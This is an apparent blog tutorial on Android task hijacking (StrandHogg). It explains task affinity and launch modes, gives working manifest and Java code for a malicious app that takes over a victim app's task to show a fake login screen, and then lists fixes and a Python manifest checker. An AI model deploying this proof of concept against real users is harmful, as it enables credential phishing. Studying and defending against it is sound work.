Task Hijacking in Android

Ashirkul
3 min read · Mar 22, 2023


Task hijacking is a screen-hijacking technique that affects applications running on Android devices. To understand it, we first need a few basic concepts:

  1. Task: From the user’s perspective, one can simply say that each application is a task. From Android’s perspective, however, things are a little different: Android allows multiple applications to be part of a single task. By the official definition, “A task is a collection of activities that users interact with when trying to do something in your app”.
  2. Back stack: These activities are arranged in a stack, “the back stack”, in the order in which each activity is opened. Think of it as a normal stack of activities; pressing Back pops the top of the stack.

Deep-dive link : https://developer.android.com/guide/components/activities/tasks-and-back-stack#life-cycle

Now let’s take an example to understand this better.

Suppose you open the Gmail application, open a mail, and then tap a link in that mail so that the Chrome browser opens. Although the app has changed from Gmail to Chrome, the task is the same.

According to the Android security model, all apps running on the device are isolated and sandboxed from one another, but this is not the case when it comes to tasks. Android allows activities from different apps to co-reside in the same task, and this is the root cause of the vulnerability. Task hijacking and its impact on Android were first presented at USENIX in 2015.

Task affinity is an attribute defined in each <activity> tag in the AndroidManifest.xml file. It describes which task an activity prefers to join. By default, every activity has the same affinity as the package name. We’ll be using this when creating our malware app.

<activity android:taskAffinity=""/>

Launch modes: Launch modes define how a new instance of an activity is associated with the current task. The launchMode attribute specifies how the activity should be launched into a particular task. There are four launch modes:

  1. standard
  2. singleTop
  3. singleTask
  4. singleInstance

Deep-dive link : https://developer.android.com/guide/topics/manifest/activity-element#lmode

How to reproduce the attack?

  1. Create a new empty project.
  2. Define android:taskAffinity="<main_application_package_name>" in the malicious application’s manifest.
  3. Declare android:launchMode="singleTask" and android:excludeFromRecents="true" on the activity. The latter prevents your app from being shown in the recent applications list.

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.example.hacker_app"
    tools:ignore="ExtraText">
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"
        tools:ignore="CoarseFineLocation" />
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.Hacker_app"
        android:taskAffinity="com.example.user_application">
        <activity android:name=".MainActivity"
            android:launchMode="singleTask"
            android:excludeFromRecents="true"
            android:exported="true"
            tools:ignore="WrongManifestParent">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
</manifest>

  4. In the malicious app’s MainActivity, call moveTaskToBack(true):

package com.example.hacker_app;

import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        // Step 4: push this task to the background as soon as it is created.
        moveTaskToBack(true);
    }

    @Override
    public void onResume() {
        super.onResume();
        // Re-apply the layout whenever the task is brought back to the front.
        setContentView(R.layout.activity_main);
    }
}

Install both applications. The malicious application needs to be opened once, either before or after the vulnerable application is opened. When the vulnerable application is then opened, the malicious application will be shown instead. If this malicious application presents the same login screen as the vulnerable application, the user has no means of knowing that they are entering their credentials into a malicious application. This is also known as the StrandHogg vulnerability.

How can we fix this?

  • Set the launchMode to singleInstance, which prevents other activities from becoming part of its task.
  • A custom onBackPressed() function can also be added to override the default behaviour.
  • Setting taskAffinity="" can be a quick fix for this issue. However, keep in mind that a lot of functionality, such as deep links that use FLAG_ACTIVITY_NEW_TASK, will break.
  • From Android 11 and above, a fix for this vulnerability has been introduced.
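As an added example that is not part of the original article, the following Python script (standard library only) performs a static check over an AndroidManifest.xml and flags activities whose effective task affinity is still non-empty and whose launchMode is not singleInstance, i.e. the configuration that the first and third fixes above remove. The manifests and activity names below are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample (not from the article): a victim app whose activities
# inherit the package name as their task affinity, the default described
# above. Activity names are made up for the demonstration.
VULNERABLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.user_application">
    <application android:label="Victim">
        <activity android:name=".LoginActivity" android:exported="true" />
        <activity android:name=".KioskActivity" android:launchMode="singleInstance" />
        <activity android:name=".HelpActivity" android:taskAffinity="" />
    </application>
</manifest>"""

# The same app with the quick fix applied once, at <application> level.
HARDENED_MANIFEST = VULNERABLE_MANIFEST.replace(
    '<application android:label="Victim">',
    '<application android:label="Victim" android:taskAffinity="">')


def _attr(elem, name):
    """Read an android:-namespaced manifest attribute; None when absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def audit_task_affinity(manifest_xml):
    """Return (name, effective_affinity, launchMode) for every activity that a
    foreign activity declaring the same taskAffinity could share a task with:
    effective affinity non-empty (set on the activity, inherited from
    <application>, or defaulting to the package) and not singleInstance."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    app = root.find("application")
    app_affinity = _attr(app, "taskAffinity") if app is not None else None
    findings = []
    for activity in root.iter("activity"):
        affinity = _attr(activity, "taskAffinity")
        if affinity is None:  # nothing set on the activity itself
            affinity = package if app_affinity is None else app_affinity
        mode = _attr(activity, "launchMode") or "standard"
        if affinity != "" and mode != "singleInstance":
            findings.append((_attr(activity, "name"), affinity, mode))
    return findings


if __name__ == "__main__":
    for name, affinity, mode in audit_task_affinity(VULNERABLE_MANIFEST):
        print(f"{name}: taskAffinity={affinity!r}, launchMode={mode}")
    print("after fix:", audit_task_affinity(HARDENED_MANIFEST))
```

The check is purely static and only looks at manifest attributes; it says nothing about runtime flags such as the FLAG_ACTIVITY_NEW_TASK behaviour mentioned above, so a clean result still needs the deep-link paths to be retested after applying taskAffinity="".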
